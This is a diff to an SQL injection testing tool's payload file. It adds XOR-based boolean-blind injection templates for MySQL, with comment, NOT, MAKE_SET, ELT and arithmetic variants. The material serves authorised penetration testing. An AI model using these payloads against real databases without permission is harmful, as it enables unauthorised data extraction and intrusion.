diff --git a/data/xml/payloads/boolean_blind.xml b/data/xml/payloads/boolean_blind.xml index 67cf9940d..27c2c50b4 100644 --- a/data/xml/payloads/boolean_blind.xml +++ b/data/xml/payloads/boolean_blind.xml @@ -187,6 +187,26 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause + 1 + 1 + 3 + 1,9 + 2 + XOR [INFERENCE] + + XOR [RANDNUM]=[RANDNUM] + + + XOR [RANDNUM]=[RANDNUM1] + +
+ MySQL + >= 5.6 +
+
+ OR boolean-based blind - WHERE or HAVING clause (NOT) 1 @@ -203,6 +223,26 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (NOT) + 1 + 1 + 3 + 1,9 + 2 + XOR NOT [INFERENCE] + + XOR NOT [RANDNUM]=[RANDNUM1] + + + XOR NOT [RANDNUM]=[RANDNUM] + +
+ MySQL + >= 5.6 +
+
+ AND boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 @@ -237,6 +277,27 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (subquery - comment) + 1 + 2 + 3 + 1,9 + 2 + XOR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + XOR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + XOR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + +
+ MySQL + >= 5.6 +
+
+ AND boolean-based blind - WHERE or HAVING clause (comment) 1 @@ -271,6 +332,27 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (comment) + 1 + 2 + 3 + 1 + 2 + XOR [INFERENCE] + + XOR [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + XOR [RANDNUM]=[RANDNUM1] + +
+ MySQL + >= 5.6 +
+
+ OR boolean-based blind - WHERE or HAVING clause (NOT - comment) 1 @@ -288,6 +370,27 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (NOT - comment) + 1 + 4 + 3 + 1 + 1 + XOR NOT [INFERENCE] + + XOR NOT [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + XOR NOT [RANDNUM]=[RANDNUM1] + +
+ MySQL + >= 5.6 +
+
+ AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 @@ -328,6 +431,27 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (MySQL comment) + 1 + 3 + 3 + 1 + 2 + XOR [INFERENCE] + + XOR [RANDNUM]=[RANDNUM] + # + + + XOR [RANDNUM]=[RANDNUM1] + +
+ MySQL + >= 5.6 +
+
+ OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) 1 @@ -348,6 +472,27 @@ Tag: + + XOR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) + 1 + 3 + 3 + 1 + 2 + XOR NOT [INFERENCE] + + XOR NOT [RANDNUM]=[RANDNUM1] + # + + + XOR NOT [RANDNUM]=[RANDNUM] + +
+ MySQL + >= 5.6 +
+
+ AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) 1 @@ -445,6 +590,26 @@ Tag: + + MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) + 1 + 3 + 3 + 1,2,3 + 2 + XOR MAKE_SET([INFERENCE],[RANDNUM]) + + XOR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + XOR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL + >= 5.6 +
+
+ MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) 1 @@ -483,6 +648,26 @@ Tag: + + MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) + 1 + 4 + 3 + 1,2,3 + 2 + XOR ELT([INFERENCE],[RANDNUM]) + + XOR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + XOR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL + >= 5.6 +
+
+ MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) 1 @@ -521,6 +706,26 @@ Tag: + + MySQL XOR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int) + 1 + 5 + 3 + 1,2,3 + 2 + XOR ([INFERENCE])*[RANDNUM] + + XOR ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + XOR ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL + >= 5.6 +
+
+ PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) 1